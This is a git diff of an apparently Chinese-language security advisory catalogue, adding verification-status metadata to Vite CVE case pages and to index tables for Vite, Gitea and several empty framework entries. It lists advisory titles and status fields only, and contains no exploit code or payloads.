`official` | `2026-02-04T04:37:03.076966Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md) | -| Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS | `low` | `generated` | `official` | `2026-02-04T04:04:22.977459Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md) | -| Vite's `server.fs.deny` is bypassed when using `?import&raw` | `low` | `generated` | `official` | `2026-02-04T04:05:31.919291Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md) | -| Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem | `low` | `generated` | `official` | `2026-02-04T04:17:01.410592Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md) | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| vite allows server.fs.deny bypass via backslash on Windows | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:13:38.886554Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md) | +| Vite middleware may serve files starting with the same name with the public directory | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:33:22.508417Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md) | +| Vite's `server.fs` settings were not applied to HTML files | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:35:16.287471Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md) | +| Vite's server.fs.deny bypassed with /. for files under project root | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:27:17.681639Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md) | +| Vite has an `server.fs.deny` bypass with an invalid `request-target` | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:11:44.900383Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md) | +| Vite allows server.fs.deny to be bypassed with .svg or relative paths | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:51:38.412061Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md) | +| Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:37:24.129476Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md) | +| Vite bypasses server.fs.deny when using ?raw?? | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:13:24.371631Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md) | +| Websites were able to send any requests to the development server and read the response in vite | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:37:03.076966Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md) | +| Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:04:22.977459Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md) | +| Vite's `server.fs.deny` is bypassed when using `?import&raw` | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:05:31.919291Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md) | +| Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:17:01.410592Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md) | diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md b/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md index 33de85dd..889b722a 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:17:01.410592Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -37,6 +41,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8r # Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2024-23331` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md b/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md index 3a8272fc..9a8189c4 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:05:31.919291Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -41,6 +45,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-28 # Vite's `server.fs.deny` is bypassed when using `?import&raw` +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2024-45811` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md b/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md index bc68bde1..1793587e 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:04:22.977459Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -43,6 +47,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g4 # Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2024-45812` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md index 4ded75a5..45b62eef 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:37:03.076966Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -38,6 +42,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rc # Websites were able to send any requests to the development server and read the response in vite +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-24010` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md index a800f72c..d049a580 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:13:24.371631Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -39,6 +43,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-x574-m8 # Vite bypasses server.fs.deny when using ?raw?? +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-30208` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md index 8f9b58f8..7ae91821 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:37:24.129476Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -39,6 +43,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw # Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-31125` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md index beaffdba..a5477c33 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:51:38.412061Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -40,6 +44,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq # Vite allows server.fs.deny to be bypassed with .svg or relative paths +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-31486` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md index d5aa4b0f..7b211c09 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:11:44.900383Z" severity: "medium" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -39,6 +43,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-356w-63 # Vite has an `server.fs.deny` bypass with an invalid `request-target` +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-32395` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md index f70c4555..9dad7350 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:27:17.681639Z" severity: "medium" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -39,6 +43,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-859w-59 # Vite's server.fs.deny bypassed with /. for files under project root +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-46565` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md index aff9b7b3..1ce462d3 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:33:22.508417Z" severity: "medium" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -37,6 +41,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2 # Vite middleware may serve files starting with the same name with the public directory +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-58751` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md index f42d3073..9d4840ff 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:35:16.287471Z" severity: "medium" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -38,6 +42,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq # Vite's `server.fs` settings were not applied to HTML files +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-58752` diff --git a/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md b/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md index fc221c9b..616250a2 100644 --- a/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md +++ b/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:13:38.886554Z" severity: "medium" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -40,6 +44,15 @@ primary_source: "https://github.com/vitejs/vite/security/advisories/GHSA-93m4-66 # vite allows server.fs.deny bypass via backslash on Windows +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `vite--CVE-2025-62522` diff --git a/07-framework-security/frameworks/vue/INDEX.md b/07-framework-security/frameworks/vue/INDEX.md index 0454f0c3..e1850928 100644 --- a/07-framework-security/frameworks/vue/INDEX.md +++ b/07-framework-security/frameworks/vue/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/webpack/INDEX.md b/07-framework-security/frameworks/webpack/INDEX.md index b2e4bbcf..8218f999 100644 --- a/07-framework-security/frameworks/webpack/INDEX.md +++ b/07-framework-security/frameworks/webpack/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/werkzeug/INDEX.md b/07-framework-security/frameworks/werkzeug/INDEX.md index 3ed194fd..a4dfb455 100644 --- a/07-framework-security/frameworks/werkzeug/INDEX.md +++ b/07-framework-security/frameworks/werkzeug/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/platforms/adminer/INDEX.md b/07-framework-security/platforms/adminer/INDEX.md index 3ca04349..155a9110 100644 --- a/07-framework-security/platforms/adminer/INDEX.md +++ b/07-framework-security/platforms/adminer/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -24,6 +28,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/platforms/gitea/INDEX.md b/07-framework-security/platforms/gitea/INDEX.md index bb1e7da4..afc34924 100644 --- a/07-framework-security/platforms/gitea/INDEX.md +++ b/07-framework-security/platforms/gitea/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `37` - 近 30 天新增/更新: `37` - 重点 Markdown 案例数: `37` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `37` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,42 +29,42 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| Gitea may send release notification emails for private repositories to users whose access has been revoked in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:54.518308Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-0798.md) | -| Gitea has improper access control for uploaded attachments in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:53.977351Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20736.md) | -| Gitea does not properly validate project ownership in organization project operations in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:57.697708Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20750.md) | -| Gitea improperly exposes issue and pull request titles in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:54.012782Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20800.md) | -| Gitea improperly exposes issue titles and repository names through previously started stopwatches in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:54.692700Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20883.md) | -| Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:56.025932Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20888.md) | -| Gitea does not properly validate repository ownership when deleting Git LFS locks in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:55.339967Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20897.md) | -| Gitea does not properly validate ownership when toggling OpenID URI visibility in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:54.244003Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20904.md) | -| Gitea does not properly validate repository ownership when linking attachments to releases in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:55.747880Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20912.md) | -| Gitea's /api/v1/user endpoint has different responses for failed authentication depending on whether a username exists in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:49.801641Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-69413.md) | -| Gitea mishandles authorization for deletion of releases in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:49.095775Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68938.md) | -| Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:48.777563Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md) | -| Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:50.087298Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md) | -| Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:50.339953Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68941.md) | -| Gitea allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:49.781753Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68942.md) | -| Gitea inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:49.213758Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68943.md) | -| Gitea sometimes mishandles propagation of token scope for access control within one of its own package registries in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:50.526913Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68944.md) | -| Gitea: anonymous user can visit private user's project in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:51.457970Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68945.md) | -| Gitea vulnerable to Cross-site Scripting in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:57:50.473303Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68946.md) | -| Gitea vulnerable to Argument Injection in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:52:41.181693Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-42968.md) | -| Improper Privilege Management in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:52:33.136607Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45330.md) | -| Gitea Remote Code Execution (RCE) in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:52:20.787387Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md) | -| Denial of Service in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:52:17.939867Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md) | -| Cross-site Scripting in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:52:18.307544Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md) | -| Gitea Missing Authorization vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:50:45.472605Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-0905.md) | -| Stored Cross-site Scripting in gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:50:45.577318Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1928.md) | -| Arbitrary file deletion in gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:50:19.647131Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-27313.md) | -| Shell command injection in gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:50:23.949796Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-30781.md) | -| Path Traversal in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:50:06.638863Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-29134.md) | -| Reuse of one time passwords allowed in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:52:07.604662Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45331.md) | -| Capture-replay in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:52:07.840324Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45327.md) | -| Gitea erroneous repo clones in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:54:07.076900Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38795.md) | -| Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:54:04.686907Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md) | -| Gitea XSS Vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:53:57.848904Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md) | -| Gitea allowed assignment of private issues in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:55:04.505871Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38183.md) | -| Buffer Overflow in gitea in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:55:15.307648Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-3382.md) | -| Gitea Open Redirect in code.gitea.io/gitea | `unknown` | `generated` | `official` | `2026-03-03T04:51:49.844240Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1058.md) | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| Gitea may send release notification emails for private repositories to users whose access has been revoked in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:54.518308Z` | 